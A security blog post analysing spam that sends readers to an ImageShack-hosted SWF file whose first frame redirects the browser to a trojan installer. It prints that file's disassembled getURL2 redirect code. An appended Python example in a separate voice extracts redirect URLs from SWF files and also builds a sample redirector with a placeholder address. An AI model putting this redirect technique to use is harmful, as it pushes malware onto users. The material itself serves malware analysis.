Folks, this is the new wave: SWF file redirects continue
In an earlier blog post, I mentioned that spammers are now using Shockwave Flash (SWF) files to avoid detection (similar in nature to the trick of using Google redirects, etc. in the past).
This continues. Here’s a current example:

This is a typical spam you see these days, pushing an install of a trojan that, if installed, typically downloads a rogue antispyware program.
Clicking on the link takes us to a SWF file hosted on ImageShack:
As you can see, it’s just junk text displaying. Its entire purpose is to push the download of that install.exe file (the trojan).
If we take a wee peek inside that SWF file, we see what’s going on:
movie 'mal.swf' compressed // flash 6, total frames: 3, frame rate: 50 fps, 978x580 px
defineMovieClip 5 // total frames: 1
// unknown tag 777 length 3
exportAssets
1 as 'arial'
end // of exportAssets
exportAssets
2 as 'line1'
end // of exportAssets
exportAssets
3 as 'line2'
end // of exportAssets
exportAssets
4 as 'line3'
end // of exportAssets
end // of defineMovieClip 5
frame 1
exportAssets
5 as 'TextBox'
end // of exportAssets
constants 'http://89 187 49 18/install exe', '_self'
push 'http://89 187 49 18/install exe', '_self'
getURL2
end // of frame 1
frame 2
stop
end // of frame 2
end

The script in frame 1 is the whole trick: it loads the download URL and the target '_self' from the constant pool, pushes both and calls getURL2, so the browser window that opened the movie is sent straight to install.exe the moment the first frame plays. Frame 2 just stops the movie. The junk text is only there so the page has something to show.

So the malware authors have a nice place to redirect from: a file hosted on ImageShack.
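To show what that listing is reading by hand, here is an added example (my own code, not from the post and not flasm): it parses the SWF tag stream, walks the ActionScript 2 bytecode inside DoAction tags and reports every url/target pair handed to ActionGetURL or ActionGetURL2, the same constants / push / getURL2 sequence shown above. The file it scans is constructed inline to match the shape of the redirector (a compressed two-frame movie whose first frame is ConstantPool, Push, GetURL2 and whose second frame is Stop); the address inside it, http://example.invalid/install.exe, is a placeholder, not the post's, and the function and constant names are mine.

```python
"""Pull redirect targets out of a SWF's ActionScript 2 bytecode (added example, not the
post's code): decode DoAction records and list the url/target each GetURL/GetURL2 uses."""
import struct
import zlib

DO_ACTION, SHOW_FRAME, END_TAG = 12, 1, 0
ACT_END, ACT_STOP = 0x00, 0x07
ACT_GET_URL, ACT_CONST_POOL, ACT_PUSH, ACT_GET_URL2 = 0x83, 0x88, 0x96, 0x9A
PUSH_SKIP = {1: 4, 2: 0, 3: 0, 4: 1, 5: 1, 6: 8, 7: 4}  # byte sizes of non-string push kinds

def _cstr(buf, pos):
    # Read the NUL-terminated string at pos; return (text, position after the NUL).
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode("latin-1"), end + 1

def swf_body(data):
    # Return (version, tag stream) for an FWS (plain) or CWS (zlib-compressed) file.
    if data[:3] == b"FWS":
        return data[3], data[8:]
    if data[:3] == b"CWS":
        return data[3], zlib.decompress(data[8:])
    raise ValueError("unsupported SWF signature %r" % data[:3])

def iter_tags(body):
    """Yield (tag code, payload) after the RECT / frame-rate / frame-count header."""
    nbits = body[0] >> 3                      # RECT opens with a 5-bit field width
    pos = (5 + 4 * nbits + 7) // 8 + 4        # RECT bytes + u16 frame rate + u16 frame count
    while pos + 2 <= len(body):
        code_len = struct.unpack_from("<H", body, pos)[0]
        code, length, pos = code_len >> 6, code_len & 0x3F, pos + 2
        if length == 0x3F:                    # long form: real length follows as u32
            length, pos = struct.unpack_from("<I", body, pos)[0], pos + 4
        yield code, body[pos:pos + length]
        pos += length
        if code == END_TAG:
            break

def urls_in_actions(actions):
    """Decode AS2 action records; return [(url, target)] for every GetURL / GetURL2."""
    found, pool, stack, pos = [], [], [], 0
    while pos < len(actions) and actions[pos] != ACT_END:
        code, pos, length = actions[pos], pos + 1, 0
        if code >= 0x80:                      # only actions >= 0x80 carry a length + payload
            length, pos = struct.unpack_from("<H", actions, pos)[0], pos + 2
        payload, pos = actions[pos:pos + length], pos + length
        if code == ACT_CONST_POOL:
            count, p, pool = struct.unpack_from("<H", payload, 0)[0], 2, []
            for _ in range(count):
                s, p = _cstr(payload, p)
                pool.append(s)
        elif code == ACT_PUSH:
            p = 0
            while p < len(payload):
                kind, p = payload[p], p + 1
                if kind == 0:                 # inline string
                    s, p = _cstr(payload, p)
                    stack.append(s)
                elif kind in (8, 9):          # constant pool index, u8 or u16
                    idx = payload[p] if kind == 8 else struct.unpack_from("<H", payload, p)[0]
                    stack.append(pool[idx])
                    p += 1 if kind == 8 else 2
                else:                         # numbers, null, registers: placeholder only
                    stack.append(None)
                    p += PUSH_SKIP.get(kind, 0)
        elif code == ACT_GET_URL:             # url and target are inline strings
            url, p = _cstr(payload, 0)
            found.append((url, _cstr(payload, p)[0]))
        elif code == ACT_GET_URL2 and len(stack) >= 2:
            target, url = stack.pop(), stack.pop()   # url was pushed first, target second
            found.append((url, target))
    return found

def scan_swf(data):
    """Summarise a SWF: version, fps, frame count, and every GetURL/GetURL2 url+target."""
    version, body = swf_body(data)
    rate, frames = struct.unpack_from("<HH", body, (5 + 4 * (body[0] >> 3) + 7) // 8)
    urls = []
    for code, payload in iter_tags(body):
        if code == DO_ACTION:
            urls += urls_in_actions(payload)
    return {"version": version, "fps": rate / 256.0, "frames": frames, "urls": urls}

def build_sample_swf(url, target="_self"):
    """Constructed two-frame CWS shaped like the post's redirector (not the real mal.swf)."""
    def tag(code, payload):                   # RECORDHEADER: short form, long form from 63 bytes
        if len(payload) < 0x3F:
            return struct.pack("<H", (code << 6) | len(payload)) + payload
        return struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload
    def action(code, payload=b""):
        return bytes([code]) + (struct.pack("<H", len(payload)) + payload if code >= 0x80 else b"")
    pool = struct.pack("<H", 2) + url.encode() + b"\x00" + target.encode() + b"\x00"
    frame1 = (action(ACT_CONST_POOL, pool) + action(ACT_PUSH, bytes([8, 0, 8, 1]))
              + action(ACT_GET_URL2, b"\x00") + action(ACT_END))   # push #0, #1; getURL2
    frame2 = action(ACT_STOP) + action(ACT_END)
    body = (b"\x00" + struct.pack("<HH", 50 << 8, 2)            # empty RECT, 50 fps, 2 frames
            + tag(DO_ACTION, frame1) + tag(SHOW_FRAME, b"")
            + tag(DO_ACTION, frame2) + tag(SHOW_FRAME, b"") + tag(END_TAG, b""))
    return b"CWS" + bytes([6]) + struct.pack("<I", 8 + len(body)) + zlib.compress(body)

SAMPLE_URL = "http://example.invalid/install.exe"   # placeholder address, not the post's
```

Running scan_swf(build_sample_swf(SAMPLE_URL)) returns the version, frame rate and frame count from the header plus [(SAMPLE_URL, '_self')], which is the whole redirector summed up in one tuple. Point scan_swf at the bytes of any real SWF you pull off a host like ImageShack and it handles both compressed and uncompressed files; it only models the constant pool and push stack, so a movie that builds the URL through string operations would need the full ActionScript interpreter that flasm or swfdump provide.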
Alex Eckelberry